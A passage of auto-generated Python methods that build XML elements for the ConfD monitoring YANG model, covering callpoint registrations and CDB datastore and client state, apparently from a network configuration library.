name_key = ET.SubElement(notification_stream_replay, "name")
name_key.text = kwargs.pop('name')
error = ET.SubElement(notification_stream_replay, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authentication_callback_enabled(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authentication_callback = ET.SubElement(callpoints, "authentication-callback")
enabled = ET.SubElement(authentication_callback, "enabled")
enabled.text = kwargs.pop('enabled')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authentication_callback_registration_type_daemon_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authentication_callback = ET.SubElement(callpoints, "authentication-callback")
registration_type = ET.SubElement(authentication_callback, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
id = ET.SubElement(daemon, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authentication_callback_registration_type_daemon_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authentication_callback = ET.SubElement(callpoints, "authentication-callback")
registration_type = ET.SubElement(authentication_callback, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authentication_callback_registration_type_daemon_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authentication_callback = ET.SubElement(callpoints, "authentication-callback")
registration_type = ET.SubElement(authentication_callback, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authentication_callback_registration_type_range_path(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authentication_callback = ET.SubElement(callpoints, "authentication-callback")
registration_type = ET.SubElement(authentication_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
path = ET.SubElement(range, "path")
path.text = kwargs.pop('path')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authentication_callback_registration_type_range_range_lower(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authentication_callback = ET.SubElement(callpoints, "authentication-callback")
registration_type = ET.SubElement(authentication_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
lower = ET.SubElement(range, "lower")
lower.text = kwargs.pop('lower')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authentication_callback_registration_type_range_range_upper(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authentication_callback = ET.SubElement(callpoints, "authentication-callback")
registration_type = ET.SubElement(authentication_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
upper = ET.SubElement(range, "upper")
upper.text = kwargs.pop('upper')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authentication_callback_registration_type_range_range_default(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authentication_callback = ET.SubElement(callpoints, "authentication-callback")
registration_type = ET.SubElement(authentication_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
default = ET.SubElement(range, "default")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authentication_callback_registration_type_range_range_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authentication_callback = ET.SubElement(callpoints, "authentication-callback")
registration_type = ET.SubElement(authentication_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
id = ET.SubElement(daemon, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authentication_callback_registration_type_range_range_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authentication_callback = ET.SubElement(callpoints, "authentication-callback")
registration_type = ET.SubElement(authentication_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authentication_callback_registration_type_range_range_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authentication_callback = ET.SubElement(callpoints, "authentication-callback")
registration_type = ET.SubElement(authentication_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authentication_callback_registration_type_file_file(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authentication_callback = ET.SubElement(callpoints, "authentication-callback")
registration_type = ET.SubElement(authentication_callback, "registration-type")
file = ET.SubElement(registration_type, "file")
file = ET.SubElement(file, "file")
file.text = kwargs.pop('file')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authentication_callback_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authentication_callback = ET.SubElement(callpoints, "authentication-callback")
error = ET.SubElement(authentication_callback, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authorization_callbacks_enabled(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authorization_callbacks = ET.SubElement(callpoints, "authorization-callbacks")
enabled = ET.SubElement(authorization_callbacks, "enabled")
enabled.text = kwargs.pop('enabled')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authorization_callbacks_registration_type_daemon_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authorization_callbacks = ET.SubElement(callpoints, "authorization-callbacks")
registration_type = ET.SubElement(authorization_callbacks, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
id = ET.SubElement(daemon, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authorization_callbacks_registration_type_daemon_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authorization_callbacks = ET.SubElement(callpoints, "authorization-callbacks")
registration_type = ET.SubElement(authorization_callbacks, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authorization_callbacks_registration_type_daemon_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authorization_callbacks = ET.SubElement(callpoints, "authorization-callbacks")
registration_type = ET.SubElement(authorization_callbacks, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authorization_callbacks_registration_type_range_path(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authorization_callbacks = ET.SubElement(callpoints, "authorization-callbacks")
registration_type = ET.SubElement(authorization_callbacks, "registration-type")
range = ET.SubElement(registration_type, "range")
path = ET.SubElement(range, "path")
path.text = kwargs.pop('path')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authorization_callbacks_registration_type_range_range_lower(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authorization_callbacks = ET.SubElement(callpoints, "authorization-callbacks")
registration_type = ET.SubElement(authorization_callbacks, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
lower = ET.SubElement(range, "lower")
lower.text = kwargs.pop('lower')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authorization_callbacks_registration_type_range_range_upper(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authorization_callbacks = ET.SubElement(callpoints, "authorization-callbacks")
registration_type = ET.SubElement(authorization_callbacks, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
upper = ET.SubElement(range, "upper")
upper.text = kwargs.pop('upper')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authorization_callbacks_registration_type_range_range_default(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authorization_callbacks = ET.SubElement(callpoints, "authorization-callbacks")
registration_type = ET.SubElement(authorization_callbacks, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
default = ET.SubElement(range, "default")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authorization_callbacks_registration_type_range_range_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authorization_callbacks = ET.SubElement(callpoints, "authorization-callbacks")
registration_type = ET.SubElement(authorization_callbacks, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
id = ET.SubElement(daemon, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authorization_callbacks_registration_type_range_range_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authorization_callbacks = ET.SubElement(callpoints, "authorization-callbacks")
registration_type = ET.SubElement(authorization_callbacks, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authorization_callbacks_registration_type_range_range_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authorization_callbacks = ET.SubElement(callpoints, "authorization-callbacks")
registration_type = ET.SubElement(authorization_callbacks, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authorization_callbacks_registration_type_file_file(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authorization_callbacks = ET.SubElement(callpoints, "authorization-callbacks")
registration_type = ET.SubElement(authorization_callbacks, "registration-type")
file = ET.SubElement(registration_type, "file")
file = ET.SubElement(file, "file")
file.text = kwargs.pop('file')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authorization_callbacks_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authorization_callbacks = ET.SubElement(callpoints, "authorization-callbacks")
error = ET.SubElement(authorization_callbacks, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_datastore_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
datastore = ET.SubElement(cdb, "datastore")
name = ET.SubElement(datastore, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_datastore_transaction_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
datastore = ET.SubElement(cdb, "datastore")
name_key = ET.SubElement(datastore, "name")
name_key.text = kwargs.pop('name')
transaction_id = ET.SubElement(datastore, "transaction-id")
transaction_id.text = kwargs.pop('transaction_id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_datastore_write_queue(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
datastore = ET.SubElement(cdb, "datastore")
name_key = ET.SubElement(datastore, "name")
name_key.text = kwargs.pop('name')
write_queue = ET.SubElement(datastore, "write-queue")
write_queue.text = kwargs.pop('write_queue')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_datastore_filename(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
datastore = ET.SubElement(cdb, "datastore")
name_key = ET.SubElement(datastore, "name")
name_key.text = kwargs.pop('name')
filename = ET.SubElement(datastore, "filename")
filename.text = kwargs.pop('filename')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_datastore_disk_size(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
datastore = ET.SubElement(cdb, "datastore")
name_key = ET.SubElement(datastore, "name")
name_key.text = kwargs.pop('name')
disk_size = ET.SubElement(datastore, "disk-size")
disk_size.text = kwargs.pop('disk_size')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_datastore_ram_size(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
datastore = ET.SubElement(cdb, "datastore")
name_key = ET.SubElement(datastore, "name")
name_key.text = kwargs.pop('name')
ram_size = ET.SubElement(datastore, "ram-size")
ram_size.text = kwargs.pop('ram_size')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_datastore_read_locks(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
datastore = ET.SubElement(cdb, "datastore")
name_key = ET.SubElement(datastore, "name")
name_key.text = kwargs.pop('name')
read_locks = ET.SubElement(datastore, "read-locks")
read_locks.text = kwargs.pop('read_locks')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_datastore_write_lock_set(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
datastore = ET.SubElement(cdb, "datastore")
name_key = ET.SubElement(datastore, "name")
name_key.text = kwargs.pop('name')
write_lock_set = ET.SubElement(datastore, "write-lock-set")
write_lock_set.text = kwargs.pop('write_lock_set')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_datastore_subscription_lock_set(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
datastore = ET.SubElement(cdb, "datastore")
name_key = ET.SubElement(datastore, "name")
name_key.text = kwargs.pop('name')
subscription_lock_set = ET.SubElement(datastore, "subscription-lock-set")
subscription_lock_set.text = kwargs.pop('subscription_lock_set')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_datastore_waiting_for_replication_sync(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
datastore = ET.SubElement(cdb, "datastore")
name_key = ET.SubElement(datastore, "name")
name_key.text = kwargs.pop('name')
waiting_for_replication_sync = ET.SubElement(datastore, "waiting-for-replication-sync")
waiting_for_replication_sync.text = kwargs.pop('waiting_for_replication_sync')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_datastore_pending_subscription_sync_priority(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
datastore = ET.SubElement(cdb, "datastore")
name_key = ET.SubElement(datastore, "name")
name_key.text = kwargs.pop('name')
pending_subscription_sync = ET.SubElement(datastore, "pending-subscription-sync")
priority = ET.SubElement(pending_subscription_sync, "priority")
priority.text = kwargs.pop('priority')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_datastore_pending_subscription_sync_notification_client_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
datastore = ET.SubElement(cdb, "datastore")
name_key = ET.SubElement(datastore, "name")
name_key.text = kwargs.pop('name')
pending_subscription_sync = ET.SubElement(datastore, "pending-subscription-sync")
notification = ET.SubElement(pending_subscription_sync, "notification")
client_name = ET.SubElement(notification, "client-name")
client_name.text = kwargs.pop('client_name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_datastore_pending_subscription_sync_time_remaining(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
datastore = ET.SubElement(cdb, "datastore")
name_key = ET.SubElement(datastore, "name")
name_key.text = kwargs.pop('name')
pending_subscription_sync = ET.SubElement(datastore, "pending-subscription-sync")
time_remaining = ET.SubElement(pending_subscription_sync, "time-remaining")
time_remaining.text = kwargs.pop('time_remaining')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_datastore_pending_notification_queue_notification_priority(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
datastore = ET.SubElement(cdb, "datastore")
name_key = ET.SubElement(datastore, "name")
name_key.text = kwargs.pop('name')
pending_notification_queue = ET.SubElement(datastore, "pending-notification-queue")
notification = ET.SubElement(pending_notification_queue, "notification")
priority = ET.SubElement(notification, "priority")
priority.text = kwargs.pop('priority')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_datastore_pending_notification_queue_notification_client_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
datastore = ET.SubElement(cdb, "datastore")
name_key = ET.SubElement(datastore, "name")
name_key.text = kwargs.pop('name')
pending_notification_queue = ET.SubElement(datastore, "pending-notification-queue")
notification = ET.SubElement(pending_notification_queue, "notification")
client_name = ET.SubElement(notification, "client-name")
client_name.text = kwargs.pop('client_name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_client_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
client = ET.SubElement(cdb, "client")
name = ET.SubElement(client, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_client_info(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
client = ET.SubElement(cdb, "client")
info = ET.SubElement(client, "info")
info.text = kwargs.pop('info')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_client_type(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
client = ET.SubElement(cdb, "client")
type = ET.SubElement(client, "type")
type.text = kwargs.pop('type')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_client_datastore(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
client = ET.SubElement(cdb, "client")
datastore = ET.SubElement(client, "datastore")
datastore.text = kwargs.pop('datastore')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_client_lock(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
client = ET.SubElement(cdb, "client")
lock = ET.SubElement(client, "lock")
lock.text = kwargs.pop('lock')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_client_subscription_datastore(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
client = ET.SubElement(cdb, "client")
subscription = ET.SubElement(client, "subscription")
datastore = ET.SubElement(subscription, "datastore")
datastore.text = kwargs.pop('datastore')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_client_subscription_twophase(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
client = ET.SubElement(cdb, "client")
subscription = ET.SubElement(client, "subscription")
twophase = ET.SubElement(subscription, "twophase")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_client_subscription_priority(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
client = ET.SubElement(cdb, "client")
subscription = ET.SubElement(client, "subscription")
priority = ET.SubElement(subscription, "priority")
priority.text = kwargs.pop('priority')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_client_subscription_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
client = ET.SubElement(cdb, "client")
subscription = ET.SubElement(client, "subscription")
id = ET.SubElement(subscription, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_client_subscription_path(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
client = ET.SubElement(cdb, "client")
subscription = ET.SubElement(client, "subscription")
path = ET.SubElement(subscription, "path")
path.text = kwargs.pop('path')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_client_subscription_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
client = ET.SubElement(cdb, "client")
